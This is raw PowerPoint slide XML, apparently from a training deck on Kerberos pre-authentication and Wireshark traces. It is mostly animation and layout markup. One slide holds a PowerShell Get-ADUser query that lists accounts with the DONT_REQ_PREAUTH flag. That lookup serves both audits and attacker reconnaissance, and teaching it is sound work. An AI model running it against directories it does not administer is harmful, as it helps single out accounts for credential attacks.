                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="113" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="114" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="117" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="118" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>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70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="126" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="127" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="129" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>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2" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="134" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="135" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="136" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="137" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13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59" grpId="0" animBg="1"/>
      <p:bldP spid="60" grpId="0" animBg="1"/>
      <p:bldP spid="49" grpId="0"/>
      <p:bldP spid="3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endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>WireShark</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477639" y="840312"/>
            <a:ext cx="3551436" cy="231251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2500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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35496" y="1100824"/>
            <a:ext cx="9073008" cy="2184160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2500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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44168" y="3428999"/>
            <a:ext cx="9073008" cy="2184160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2500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9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27608" y="5877271"/>
            <a:ext cx="9073008" cy="720081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2500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10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506631" y="524868"/>
            <a:ext cx="825009" cy="270488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2500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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374753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8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="5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261335"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows an authentication request that requires pre-authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pre-Authentication in a network trace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="no pre auth"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="459662" y="1825724"/>
            <a:ext cx="8086725" cy="3619500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="mark no pre auth"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="3789040"/>
            <a:ext cx="3816424" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2500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6" name="comment no pre auth"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5971798" y="3960900"/>
            <a:ext cx="2592288" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>This request is only a PAC request and does not provide additional information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="arrow no pre auth"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2987824" y="4265568"/>
            <a:ext cx="2808312" cy="34166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9" name="with pre auth"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="459662" y="1825724"/>
            <a:ext cx="8048625" cy="4438650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="mark with pre auth"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753358" y="3788326"/>
            <a:ext cx="5330809" cy="2476047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2500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15" name="comment pre auth"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6124198" y="4113300"/>
            <a:ext cx="2592288" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>This request contains the PAC request and the encrypted timestamp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="arrow pre auth"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2987824" y="4417968"/>
            <a:ext cx="2960712" cy="235168"/>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arrow pre auth"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2843808" y="4417967"/>
            <a:ext cx="3144760" cy="102081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41536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2"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>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6" grpId="0"/>
      <p:bldP spid="6" grpId="1"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>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261335"/>
            <a:ext cx="7924800" cy="2923877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client sends an authenticator along with the TGT request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The authenticator includes a timestamp encrypted with the user’s master key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find all users that do not require pre-authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pre-Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="2348880"/>
            <a:ext cx="4289768" cy="1322583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827585" y="4293096"/>
            <a:ext cx="8208912" cy="1466555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$DONT_REQ_PREAUTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4194304</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#https://support.microsoft.com/en-us/kb/305144</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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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-Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserAccountControl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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-band</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$DONT_REQ_PREAUTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B06090405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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
